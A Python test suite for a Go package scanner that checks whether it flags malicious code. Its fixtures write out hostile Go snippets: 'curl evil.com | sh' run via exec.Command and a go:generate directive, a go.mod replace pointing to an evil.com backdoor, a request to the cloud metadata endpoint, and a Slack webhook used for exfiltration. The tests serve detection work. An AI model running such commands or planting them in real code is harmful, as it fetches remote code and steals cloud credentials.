"""Tests for GoStaticAnalysisScanner."""

from app.core.config import Settings
from app.scanners.static_analysis_go import GoStaticAnalysisScanner
from app.schemas.package import PackageInfo


def _make_scanner() -> GoStaticAnalysisScanner:
    return GoStaticAnalysisScanner(Settings())


def _make_package() -> PackageInfo:
    return PackageInfo(name="github.com/test/pkg", version="v1.0.0", registry="go")


async def test_clean_go_file(tmp_path):
    f = tmp_path / "main.go"
    f.write_text('package main\n\nimport "fmt"\n\nfunc main() {\n\tfmt.Println("hello")\n}\n')

    scanner = _make_scanner()
    result = await scanner.scan(_make_package(), [f])
    assert result.verdict == "pass"


async def test_exec_command_detected(tmp_path):
    f = tmp_path / "main.go"
    f.write_text('package main\n\nimport "os/exec"\n\nfunc run() {\n\texec.Command("sh", "-c", "whoami")\n}\n')

    scanner = _make_scanner()
    result = await scanner.scan(_make_package(), [f])
    assert result.verdict in ("warn", "fail")
    assert "exec" in result.details.lower()


async def test_shell_invocation_critical(tmp_path):
    f = tmp_path / "main.go"
    f.write_text(
        'package main\nimport "os/exec"\nfunc run() {\n\texec.Command("bash", "-c", "curl evil.com | sh")\n}\n'
    )

    scanner = _make_scanner()
    result = await scanner.scan(_make_package(), [f])
    assert result.verdict == "fail"


async def test_cgo_import_detected(tmp_path):
    f = tmp_path / "cgo.go"
    f.write_text('package main\n\n// #include <stdlib.h>\nimport "C"\n\nfunc main() {}\n')

    scanner = _make_scanner()
    result = await scanner.scan(_make_package(), [f])
    assert result.verdict == "warn"


async def test_go_generate_shell(tmp_path):
    f = tmp_path / "gen.go"
    f.write_text("package main\n\n//go:generate bash -c 'curl evil.com | sh'\n")

    scanner = _make_scanner()
    result = await scanner.scan(_make_package(), [f])
    assert result.verdict == "fail"


async def test_go_linkname_detected(tmp_path):
    f = tmp_path / "hack.go"
    f.write_text('package main\n\nimport _ "unsafe"\n\n//go:linkname localFunc runtime.goexit\n')

    scanner = _make_scanner()
    result = await scanner.scan(_make_package(), [f])
    assert result.verdict == "warn"


async def test_gomod_replace_directive(tmp_path):
    f = tmp_path / "go.mod"
    f.write_text("module example.com/mod\n\ngo 1.21\n\nreplace example.com/dep => https://evil.com/backdoor\n")

    scanner = _make_scanner()
    result = await scanner.scan(_make_package(), [f])
    assert result.verdict == "warn"
    assert "replace" in result.details.lower()


async def test_cloud_metadata_critical(tmp_path):
    f = tmp_path / "steal.go"
    f.write_text(
        'package main\n\nimport "net/http"\n\nfunc steal() {\n'
        '\thttp.Get("http://169.254.169.254/latest/meta-data/")\n}\n'
    )

    scanner = _make_scanner()
    result = await scanner.scan(_make_package(), [f])
    assert result.verdict == "fail"


async def test_generated_code_downgraded(tmp_path):
    f = tmp_path / "gen.go"
    f.write_text(
        "// Code generated by stringer; DO NOT EDIT.\n"
        "package main\n\n"
        'import "os/exec"\n\n'
        'func run() { exec.Command("sh", "-c", "test") }\n'
    )

    scanner = _make_scanner()
    result = await scanner.scan(_make_package(), [f])
    # Critical should be downgraded to high due to safe indicator
    matches = result.metadata.get("matches", [])
    for m in matches:
        assert m["severity"] != "critical"


async def test_nonexistent_file(tmp_path):
    f = tmp_path / "missing.go"
    scanner = _make_scanner()
    result = await scanner.scan(_make_package(), [f])
    assert result.verdict == "pass"


async def test_webhook_exfiltration(tmp_path):
    f = tmp_path / "exfil.go"
    f.write_text('package main\n\nvar url = "https://hooks.slack.com/services/T00/B00/XXX"\n')

    scanner = _make_scanner()
    result = await scanner.scan(_make_package(), [f])
    assert result.verdict == "fail"
